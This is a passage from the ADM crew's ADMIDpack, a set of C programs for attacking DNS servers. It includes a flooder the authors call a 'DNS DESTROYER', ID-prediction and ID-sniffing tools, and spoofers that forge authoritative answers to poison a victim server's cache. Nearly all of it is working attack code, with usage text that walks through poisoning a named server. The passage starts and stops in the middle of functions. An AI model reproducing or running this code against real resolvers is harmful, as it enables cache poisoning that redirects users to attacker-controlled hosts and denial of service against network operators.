| for(i=0;i<4;i++){ |
| A[i] =(char *)malloc(4); |
| bzero(A[i],4); |
| } |
|
|
| bzero(bla,sizeof(bla)); |
| bzero(arf,sizeof(arf)); |
|
|
| for(i=0;i<strlen(ip);i++) |
| { |
| c = ip[i]; |
| if( c == '.'){ |
| strcat(A[a],arf); |
| a--; |
| k=0; |
| bzero(arf,sizeof(arf)); |
| } |
| else arf[k++] = c; |
| } |
| |
| strcat(A[a],arf); |
| |
| for(i=0;i<4;i++){ |
| strcat(bla,A[i]); |
| strcat(bla,"."); |
| } |
| |
|
|
| strcat(bla,arpa); |
| nameformat(bla,haha); |
| strcpy(resu,haha); |
| } |
|
|
|
|
|
|
| int makepaketQS(char *data,char *name,int type) |
| { |
|
|
| if(type == TYPE_A ){ |
| nameformat(name,data); |
| *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_A); |
| } |
|
|
| if(type == TYPE_PTR){ |
| nameformatIP(name,data); |
| *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR); |
| } |
| |
| *( (u_short *) (data+strlen(data)+3) ) = htons(1); |
| return(strlen(data)+5); |
|
|
| } |
|
|
|
|
| int makepaketAW(char *data,char *name, char *ip,int type) |
| { |
| int i; |
| char tmp[2550]; |
| bzero(tmp,sizeof(tmp)); |
|
|
| if( type == TYPE_A ){ |
| nameformat(name,data); |
| *( (u_short *) (data+strlen(data)+1) ) = htons(1); |
| *( (u_short *) (data+strlen(data)+3) ) = htons(1); |
| i=strlen(data)+5; |
| strcpy(data+i,data); |
| i=i+strlen(data)+1; |
| *((u_short *) (data+i)) = htons(TYPE_A); |
| *((u_short *) (data+i+2)) = htons(1); |
| *((u_long *) (data+i+4)) = 9999999; |
| *((u_short *) (data+i+8)) = htons(4); |
| *((u_long *) (data+i+10)) = host2ip(ip); |
| return(i+14); |
| } |
|
|
| if( type == TYPE_PTR ){ |
| nameformat(name,tmp); |
| nameformatIP(ip,data); |
| *( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR); |
| *( (u_short *) (data+strlen(data)+3) ) = htons(1); |
| i=strlen(data)+5; |
| strcpy((data+i),data); |
| i=(i+strlen(data)+1); |
| *((u_short *) (data+i)) = htons(TYPE_PTR); |
| *((u_short *) (data+i+2)) = htons(1); |
| *((u_long *) (data+i+4)) = 9999999; |
| *((u_short *) (data+i+8)) = htons(strlen(tmp)+1); |
| strcpy((data+i+10),tmp); |
| return(i+10+strlen(tmp)+1); |
| } |
| } |
|
|
| void sendquestion(u_long s_ip, u_long d_ip,char *name,int type) |
| { |
| struct dnshdr *dns; |
| char buff[1024]; |
| char *data; |
| int i; |
| int on=1; |
| int sraw; |
|
|
| if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ |
| perror("socket"); |
| exit(ERROR); |
| } |
| |
| if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
|
|
| dns = (struct dnshdr *) buff; |
| data = (char *)(buff+DNSHDRSIZE); |
|
|
| bzero(buff,sizeof(buff)); |
|
|
| dns->id = 6000+myrand(); |
| dns->qr = 0; |
| dns->rd = 1; |
| dns->aa = 0; |
| dns->que_num = htons(1); |
| dns->rep_num = htons(0); |
| i=makepaketQS(data,name,type); |
| udp_send(sraw,s_ip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i); |
| close(sraw); |
| } |
|
|
| void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type) |
| { |
| struct dnshdr *dns; |
| char buff[1024]; |
| char *data; |
| int i; |
| int on=1; |
| int sraw; |
| |
| if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ |
| perror("socket"); |
| exit(ERROR); |
| } |
| |
| if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
|
|
| dns = (struct dnshdr *) buff; |
| data = (char *)(buff+DNSHDRSIZE); |
|
|
| bzero(buff,sizeof(buff)); |
|
|
| dns->id = htons(ID); |
| dns->qr = 1; |
| dns->rd = 1; |
| dns->aa = 1; |
| dns->que_num = htons(1); |
| dns->rep_num = htons(1); |
| i=makepaketAW(data,name,spoofip,type); |
| printf(" I apres Makepaket == %i \n",i); |
| udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i); |
| close(sraw); |
| } |
| |
|
|
| void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type) |
| { |
| struct dnshdr *dns; |
| char buff[1024]; |
| char *data; |
| u_long fakeip; |
| u_long trustip; |
| u_long victimip; |
| int loop,rere; |
| |
| dns = (struct dnshdr *)buff; |
| data = (char *)(buff+DNSHDRSIZE); |
| |
| |
| |
| trustip = host2ip(dnstrust); |
| victimip = host2ip(victim); |
| fakeip = host2ip("12.1.1.0"); |
| |
| /* send question ... */ |
| if( type == TYPE_PTR) |
| for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type); |
| |
| if( type == TYPE_A) |
| for(loop=0;loop<4;loop++) |
| sendquestion(fakeip,victimip,spoofname,type); |
| |
| |
| /* now its time to awnser Quickly !!! */ |
| for(rere = 0; rere < 2;rere++){ |
| for(loop=0;loop < 80;loop++){ |
| printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n", |
| dnstrust,victim,spoofname,spoofip,ID+loop,type); |
| sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type); |
| } |
| } |
| |
| |
| } |
| <--> |
| <++> ADMIDpack/ADMdnsfuckr.c |
| /* ADM DNS DESTROYER */ |
|
|
|
|
| #define DNSHDRSIZE 12 |
| #define VERSION "0.2 pub" |
| #define ERROR -1 |
|
|
| #include <stdio.h> |
| #include <stdlib.h> |
| #include "ADM-spoof.c" |
| #include "dns.h" |
| #include "ADMDNS2.c" |
|
|
| |
| void main(int argc, char **argv) |
| { |
| struct dnshdr *dns; |
| char *data; |
| char buffer2[4000]; |
| unsigned char namez[255]; |
| unsigned long s_ip; |
| unsigned long d_ip; |
| int sraw,on=1; |
|
|
|
|
| if(argc <2){printf(" usage : %s <host> \n",argv[0]); exit(0);} |
| |
| dns = (struct dnshdr *)buffer2; |
| data = (char *)(buffer2+12); |
| bzero(buffer2,sizeof(buffer2)); |
|
|
| if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ |
| perror("socket"); |
| exit(ERROR); |
| } |
| |
| if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
|
|
| printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION); |
| printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n"); |
| sleep(1); |
|
|
| s_ip=host2ip("100.1.2.3"); |
| d_ip=host2ip(argv[1]); |
|
|
| |
| |
| dns->id = 123; |
| dns->rd = 1; |
| dns->que_num = htons(1); |
| |
| while(1){ |
| |
| sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand()); |
| printf("%s\n",namez); |
| strcpy(data,namez); |
| *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12); |
| *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1); |
| udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5); |
| s_ip=ntohl(s_ip); |
| s_ip++; |
| s_ip=htonl(s_ip); |
| |
| } |
|
|
| } |
| <--> |
| <++> ADMIDpack/ADMkillDNS.c |
|
|
| #include "ADM-spoof.c" |
| #include "dns.h" |
| #include "ADMDNS2.c" |
|
|
| #define ERROR -1 |
| #define VERSION "0.3 pub" |
| #define ID_START 1 |
| #define ID_STOP 65535 |
| #define PORT_START 53 |
| #define PORT_STOP 54 |
|
|
| void main(int argc, char **argv) |
| { |
| |
| struct dnshdr *dns; |
| char *data; |
| char buffer2[4000]; |
| unsigned char namez[255]; |
| unsigned long s_ip,s_ip2; |
| unsigned long d_ip,d_ip2; |
| int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop; |
|
|
|
|
| if(argc <5){ |
| system("/usr/bin/clear"); |
| printf(" usage : %s <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]); |
| printf(" ip src: ip source of the dns anwser\n"); |
| printf(" ip dst: ip of the dns victim\n"); |
| printf(" name : spoof name ex: www.dede.com\n"); |
| printf(" ip : the ip associate with the name\n"); |
| printf(" options \n"); |
| printf(" [A,B,N] \n"); |
| printf(" A: flood the DNS victim with multiple query\n"); |
| printf(" B: DOS attack for destroy the DNS \n"); |
| printf(" N: None attack \n\n"); |
| printf(" [ID_START] \n"); |
| printf(" ID_START: id start :> \n\n"); |
| printf(" [ID_STOP] n"); |
| printf(" ID_STOP : id stop :> \n\n"); |
| printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n"); |
| printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION); |
| exit(ERROR); |
| } |
| |
| dns = (struct dnshdr *)buffer2; |
| data = (char *)(buffer2+DNSHDRSIZE); |
| bzero(buffer2,sizeof(buffer2)); |
| |
| if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ |
| perror("socket"); |
| exit(ERROR); |
| } |
| |
| |
| if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
| |
| printf("ADMkillDNS %s",VERSION); |
| printf("\nouais ben mwa je dedie ca a ma Heike"); |
| printf("\nREADY FOR ACTION!\n"); |
|
|
| s_ip2=s_ip=host2ip(argv[1]); |
| d_ip2=d_ip=host2ip(argv[2]); |
|
|
|
|
|
|
| if(argc>5)if(*argv[5]=='A') |
| { |
| for(loop=0;loop<10;loop++){ |
| dns->id = 6000+loop; |
| dns->qr = 0; |
| dns->rd = 1; |
| dns->aa = 0; |
| dns->que_num = htons(1); |
| dns->rep_num = htons(0); |
| i=makepaketQS(data,argv[3],TYPE_A); |
| udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i); |
| s_ip=ntohl(s_ip); |
| s_ip++; |
| s_ip=htonl(s_ip); |
| |
| } |
| } /* end of DNS flood query */ |
|
|
| /* ici on trouve la routine contre un DOS */ |
|
|
| if(argc>5)if(*argv[5]=='B') |
| { |
| s_ip=host2ip("100.1.2.3"); |
| dns->id = 123; |
| dns->rd = 1; |
| dns->que_num = htons(1); |
| |
| printf("plz enter the number of packet u wanna send\n"); |
| scanf("%i",&i); |
| for(x=0;x<i;x++){ |
| |
| sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand()); |
| strcpy(data,namez); |
| *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12); |
| *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1); |
| udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5); |
| s_ip=ntohl(s_ip); |
| s_ip++; |
| s_ip=htonl(s_ip); |
| printf("send packet num %i:%i\n",x,i); |
| } |
| } /* end of DNS DOS */ |
| |
| |
| if(argc > 6 )idstart = atoi(argv[6]); |
| else |
| idstart = ID_START; |
| if(argc > 7 )idstop = atoi(argv[7]); |
| else |
| idstop = ID_STOP; |
| |
| if(argc > 8 ){ |
| portstart = atoi(argv[8]); |
| portstop = atoi(argv[9]); |
| } |
|
|
| else { |
| portstart = PORT_START; |
| portstop = PORT_STOP; |
| } |
| |
|
|
| bzero(buffer2,sizeof(buffer2)); |
| bzero(namez,sizeof(namez)); |
| i=0; |
| x=0; |
| s_ip=s_ip2; |
| d_ip=d_ip2; |
|
|
|
|
| |
| for(;idstart<idstop;idstart++){ |
| dns->id = htons(idstart); |
| dns->qr = 1; |
| dns->rd = 1; |
| dns->aa = 1; |
| dns->que_num = htons(1); |
| dns->rep_num = htons(1); |
| printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop); |
| i=makepaketAW(data,argv[3],argv[4],TYPE_A); |
| for(;x < portstop; x++) |
| udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i); |
| x = portstart; |
| } |
| |
| printf(" terminated..\n"); |
| } |
| <--> |
| <++> ADMIDpack/ADMnOg00d.c |
| /***************************/ |
| /* ADMnog00d (c) ADM */ |
| /***************************/ |
| /* ADM DNS ID PREDICTOR */ |
| /***************************/ |
|
|
| #include <fcntl.h> |
| #include <unistd.h> |
| #include "dns.h" |
| #include "ADM-spoof.c" |
| #include "ADMDNS2.c" |
|
|
|
|
| #define VERSION "0.7 pub" |
| #define SPOOFIP "4.4.4.4" |
| #define ERROR -1 |
| #define LEN sizeof(struct sockaddr) |
| #define UNDASPOOF "111.111.111.111" |
| #define TIMEOUT 300 |
| #define DNSHDRSIZE 12 |
|
|
| void usage() |
| { |
|
|
| printf(" ADMnoG00D <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n"); |
| printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n"); |
| printf(" well... we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n"); |
| printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n"); |
| printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n"); |
| printf(" for more information..\n"); |
| printf(" check ftp.janova.org/pub/ADM/ \n"); |
| printf(" mail ADM@janova.org \n"); |
| printf(" ask Heike from me...:) \n"); |
| exit(-1); |
| } |
|
|
| void senddnspkt(s,d_ip,wwwname,ip,dns) |
| int s; |
| u_long d_ip; |
| char *wwwname; |
| char *ip; |
| struct dnshdr *dns; |
| { |
| struct sockaddr_in sin; |
| int i; |
| char buffer[1024]; |
| char *data = (char *)(buffer+DNSHDRSIZE); |
| bzero(buffer,sizeof(buffer)); |
| memcpy(buffer,dns,DNSHDRSIZE); |
|
|
| if(dns->qr == 0) |
| { |
| i=makepaketQS(data,wwwname,TYPE_A); |
| sin.sin_family = AF_INET; |
| sin.sin_port = htons(53); |
| sin.sin_addr.s_addr = d_ip; |
| sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); |
| } |
| |
| else |
| { |
| i=makepaketAW(data,wwwname,ip,TYPE_A); |
| sin.sin_family = AF_INET; |
| sin.sin_port = htons(53); |
| sin.sin_addr.s_addr = d_ip; |
| sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN); |
| } |
| } |
| |
| |
| |
|
|
| void dns_qs_no_rd(s,d_ip,wwwname,ID) |
| int s; |
| u_long d_ip; |
| char *wwwname; |
| int ID; |
| { |
| struct dnshdr *dns; |
| char *data; |
| char buffer[1024]; |
| int i; |
|
|
| dns = (struct dnshdr *)buffer; |
| data = (char *)(buffer+DNSHDRSIZE); |
| bzero(buffer,sizeof(buffer)); |
|
|
| dns->id = htons(ID); |
| dns->qr = 0; |
| dns->rd = 0; /* dont want the recusion !! */ |
| dns->aa = 0; |
| dns->que_num = htons(1); |
| dns->rep_num = htons(0); |
| i=makepaketQS(data,wwwname,TYPE_A); |
| senddnspkt(s,d_ip,wwwname,NULL,dns); |
| } |
| |
| |
| |
| |
| void main(int argc, char **argv) |
| { |
| struct sockaddr_in sin_rcp; |
| struct dnshdr *dns, *dns_recv; |
| char *data, *data2; |
| char buffer2[4000]; |
| char buffer[4000]; |
| char spoofname[255]; |
| char spoofip[255]; |
| char dnstrust[255]; |
| char bla[255]; |
| char *alacon; |
| unsigned char fakename[255]; |
| unsigned char namez[255]; |
| unsigned long s_ip, s_ip2; |
| unsigned long d_ip, d_ip2, trust; |
| unsigned int DA_ID = 65535, loop = 65535; |
| int sraw, s_r, i, on=1, x, ID,timez; |
| int len = sizeof(struct sockaddr); |
| |
| dns_recv = (struct dnshdr *)(buffer); |
| data2 = (char *)(buffer+DNSHDRSIZE); |
| dns = (struct dnshdr *)buffer2; |
| data = (char *)(buffer2+DNSHDRSIZE); |
| |
| bzero(buffer2,sizeof(buffer2)); |
| srand(time(NULL)); |
| |
|
|
| if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){ |
| perror("socket"); |
| exit(ERROR); |
| } |
|
|
| |
| if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){ |
| perror("fcntl"); |
| exit(ERROR); |
| } |
| |
| |
| if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){ |
| perror("socket"); |
| exit(ERROR); |
| } |
| |
| if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
| |
| if(argc < 2) usage(); |
| |
| |
| if(argc > 9 )DA_ID = loop = atoi(argv[9]); |
| |
| if(argc > 6)strcpy(spoofname,argv[6]); |
| else{ |
| printf("enter the name you wanna spoof:"); |
| scanf("%s",spoofname); |
| } |
|
|
| if(argc > 7)strcpy(bla,argv[7]); |
| else{ |
| printf("enter the ip's of the spoof name:"); |
| scanf("%s",bla); |
| } |
| |
| alacon =(char *)inet_ntoa(host2ip(bla)); |
| strcpy(spoofip,alacon); |
| |
| |
| |
| if( argc > 8 ) strcpy(bla,argv[8]); |
| else{ |
| printf("enter the DNS trust of the victim:"); |
| scanf("%s",bla); |
| } |
| |
| alacon =(char *)inet_ntoa(host2ip(bla)); |
| strcpy(dnstrust,alacon); |
| |
| |
| |
| printf("ADMnoG00d %s\n",VERSION); |
| printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n"); |
| sleep(1); |
| printf("\nLets Play =)!!\n"); |
|
|
| /* save some param */ |
| s_ip2 = host2ip(argv[1]); |
| d_ip2 = d_ip = host2ip(argv[4]); |
| trust = host2ip(argv[2]); |
| s_ip = host2ip(UNDASPOOF); |
|
|
|
|
| while(1){ |
|
|
| |
| sprintf(fakename,"%i%i%i%i%i%i.%s", |
| myrand(), |
| myrand(), |
| myrand(), |
| myrand(), |
| myrand(), |
| myrand(), |
| argv[3]); |
| |
| sendquestion(s_ip,d_ip,fakename,TYPE_A); |
| |
| |
| /* end of question packet */ |
| |
|
|
| bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ |
| bzero(namez,sizeof(namez)); |
| i=0; |
| x=0; |
|
|
|
|
| /* here start the spoof anwser */ |
|
|
| ID = loop; |
|
|
| for(;loop >= ID-10 ;loop--){ |
| dns->id = htons(loop); |
| dns->qr = 1; |
| dns->rd = 1; |
| dns->aa = 1; |
| dns->que_num = htons(1); |
| dns->rep_num = htons(1); |
| |
| i=makepaketAW(data,fakename,SPOOFIP,TYPE_A); |
| udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i); |
| } |
| |
| bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ |
| bzero(namez,sizeof(namez)); |
| i=0; |
| x=0; |
| |
| /* time for test spoof */ |
|
|
| dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */ |
| /* non recursive ! */ |
| |
| /* we waiting for awnser ... */ |
| |
| while(1){ |
| for(timez=0;timez < TIMEOUT; timez++){ |
| if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 ) |
| { |
| printf("ok whe have the reponse ;)\n"); |
| timez = 0; |
| break; |
| } |
| usleep(10); |
| timez++; |
| } |
| if(timez != 0){ |
| printf("hum no reponse from the NS ressend question..\n"); |
| dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); |
| } |
| else break; |
| } |
| /* ok we have a awnser */ |
| printf("fakename = %s\n",fakename); |
| if(sin_rcp.sin_addr.s_addr == d_ip2 ) |
| if(sin_rcp.sin_port == htons(53) ) |
| { |
| if( dns_recv->qr == 1 ) |
| if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */ |
| printf("try %i < ID < %i \n",ID-10,ID); |
| |
| else{ |
| /* Hoho we have the spoof has worked we have found the right ID ! */ |
| printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop); |
| printf("let's send the spoof...\n"); |
| dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5])); |
| printf("spoof sended ...\n"); |
| exit(0); |
| } |
| } /* end of if (sin_rcp.sin_port == htons(53) ) */ |
| bzero(buffer,sizeof(buffer)); |
| |
| } /* end of while loop */ |
|
|
| }/* end of proggies */ |
| <--> |
| <++> ADMIDpack/ADMsnOOfID.c |
| #include "ADM-spoof.c" |
| #include "dns.h" |
| #include "ADMDNS2.c" |
| #include <pcap.h> |
| #include <net/if.h> |
|
|
| #define DNSHDRSIZE 12 |
| #define SPOOF "127.0.0.1" |
| #define VERSION "ver 0.6 pub" |
| #define ERROR -1 |
|
|
| int ETHHDRSIZE; |
| |
| void main(argc, argv) |
| int argc; |
| char *argv[]; |
| { |
| struct pcap_pkthdr h; |
| struct pcap *pcap_d; |
| struct iphdr *ip; |
| struct udphdr *udp; |
| struct dnshdr *dnsrecv,*dnssend; |
| char *data; |
| char *data2; |
| char *buffer; |
| char namefake[255]; |
| char buffer2[1024]; |
| char ebuf[255]; |
| char spoofname[255]; |
| char spoofip[255]; |
| char bla[255]; |
| char dnstrust[255]; |
| char *alacon; |
| unsigned long s_ipns; |
| unsigned long d_ip; |
| |
| int sraw, i, on=1, con, ID,DA_ID,type; |
|
|
| srand( (time(NULL) % random() * random()) ); |
|
|
|
|
| if(argc <2){ |
| printf("usage : %s <device> <ns.victim.com> <your domain> <IP of ur NS> <type 1,12> <spoofname> <spoof ip> <ns trust> \n",argv[0]); |
| printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]); |
| printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); |
| exit(0); |
| } |
|
|
| if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; |
| else ETHHDRSIZE = 14; |
|
|
| if(argc>5)type=atoi(argv[5]); |
|
|
|
|
| if(argc > 6)strcpy(spoofname,argv[6]); |
| else{ |
| printf("enter the name you wanna spoof:"); |
| scanf("%s",spoofname); |
| } |
| |
| if(argc > 7)strcpy(bla,argv[7]); |
| else{ |
| printf("enter the ip's of the spoof name:"); |
| scanf("%s",bla); |
| } |
| |
| alacon =(char *)inet_ntoa(host2ip(bla)); |
| strcpy(spoofip,alacon); |
| |
| if(argc > 8)strcpy(bla,argv[8]); |
| else{ |
| printf("enter the dns trust for the spoof\n"); |
| scanf("%s",bla); |
| } |
| alacon =(char *)inet_ntoa(host2ip(bla)); |
| strcpy(dnstrust,alacon); |
| |
| |
| dnssend = (struct dnshdr *)buffer2; |
| data2 = (char *)(buffer2+DNSHDRSIZE); |
|
|
| bzero(buffer2,sizeof(buffer2)); |
| |
| |
| if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ |
| perror("socket"); |
| exit(ERROR); |
| } |
| |
| if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
| |
| printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION); |
| printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n"); |
| sleep(1); |
| |
| pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); |
|
|
| s_ipns = host2ip(argv[4]); |
| d_ip = host2ip(argv[2]); |
| con = myrand(); |
|
|
| /* make the question for get the ID */ |
|
|
| sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); |
| dnssend->id = 2600; |
| dnssend->qr = 0; |
| dnssend->rd = 1; |
| dnssend->aa = 0; |
| dnssend->que_num = htons(1); |
| dnssend->rep_num = htons(0); |
| i = makepaketQS(data2,namefake,TYPE_A); |
| udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i); |
| printf("Question sended...\n"); |
| printf("Its Time to w8 \n"); |
|
|
| while(1) |
| { |
| buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ |
| |
| ip = (struct iphdr *)(buffer+ETHHDRSIZE); |
| udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); |
| dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); |
| data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); |
|
|
| if(ip->protocol == IPPROTO_UDP){ |
| printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source)); |
| printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest)); |
| } |
|
|
| if(ip->protocol == 17 ) |
| if(ip->saddr.s_addr == d_ip ) |
| if(ip->daddr.s_addr == s_ipns ) |
| if(udp->dest == htons(53) ) |
| if(dnsrecv->qr == 0 ) |
| { |
| printf("kewl :)~ we have the packet !\n"); |
| |
| ID = dnsrecv->id ; /* we get the id */ |
| |
| printf("the current id of %s is %d \n",argv[2],ntohs(ID)); |
| |
| DA_ID = ntohs(ID); |
| |
| |
| printf("send the spoof...\n"); |
| |
| dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); |
| |
| printf("spoof sended...\n"); |
| |
| exit(0); |
| } |
| |
| |
| |
| } |
| |
| /* well now we have the ID we cant predict the ID */ |
| |
| } |
| <--> |
| <++> ADMIDpack/ADMsniffID.c |
|
|
| #include <pcap.h> |
|
|
| #include "ADM-spoof.c" |
| #include "dns.h" |
| #include "ADMDNS2.c" |
|
|
| #define ERROR -1 |
| #define DNSHDRSIZE 12 |
| #define VERSION "ver 0.4 pub" |
|
|
| int ETHHDRSIZE; |
|
|
| void usage(){ |
| printf("usage : ADMsniffID <device> <IP> <name> <type of spoof[1,12]> \n"); |
| printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n"); |
| exit(ERROR); |
| } |
| |
| void main(int argc, char **argv) |
| { |
| struct pcap_pkthdr h; |
| struct pcap *pcap_d; |
| struct iphdr *ip; |
| struct udphdr *udp; |
| struct dnshdr *dnsrecv,*dnssend; |
| char *data; |
| char *data2; |
| char *buffer; |
| char SPOOFIP[255]; |
| char bla[255]; |
| char spoofname[255]; |
| char tmp2[255]; |
| char ebuf[255]; |
| char buffer2[1024]; |
| unsigned char namez[255]; |
| int sraw,on=1,tmp1,type; |
|
|
|
|
| if(argc <2)usage(); |
| if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; |
| else ETHHDRSIZE = 14; |
| |
| strcpy(SPOOFIP,argv[2]); |
| strcpy(spoofname,argv[3]); |
| type = atoi(argv[4]); |
| |
| /* Buffer 'n' tcp/ip stuff */ |
| |
| dnssend = (struct dnshdr *)buffer2; |
| data2 = (char *)(buffer2+12); |
|
|
| |
| |
| /* bzero(buffer,sizeof(buffer)); */ |
| bzero(bla,sizeof(bla)); |
| bzero(buffer2,sizeof(buffer2)); |
| |
| |
| if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ |
| perror("socket"); |
| exit(ERROR); |
| } |
|
|
| if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ |
| perror("setsockopt"); |
| exit(ERROR); |
| } |
| |
| /* open pcap descriptor */ |
| |
| pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf); |
| |
| printf("ADMsniffID %s (c) ADMnHeike\n",VERSION); |
|
|
| while(1){ |
| |
| buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */ |
| |
| |
| ip = (struct iphdr *)(buffer+ETHHDRSIZE); |
| udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); |
| dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); |
| data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); |
|
|
| if(ip->protocol == 17) |
| if(udp->dest == htons(53) ) |
| if(dnsrecv->qr == 0) |
| { |
| strcpy(namez,data); |
| nameformat(namez,bla); |
| printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); |
| |
| bzero(bla,sizeof(bla)); |
| printf("the question have the type %i and type of the query %i\n" |
| ,ntohs(*((u_short *)(data+strlen(data)+1))) |
| ,ntohs(*((u_short *)(data+strlen(data)+2+1)))); |
| |
| /* well in diz version we only spoof the type 'A' */ |
| /* check out for a new version in ftp.janova.org/pub/ADM */ |
| |
| |
| printf("make the spoof packet...\n"); |
| printf("dns header\n"); |
|
|
| /* here we gonna start to make the spoofed paket :)*/ |
| |
| memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5); |
| |
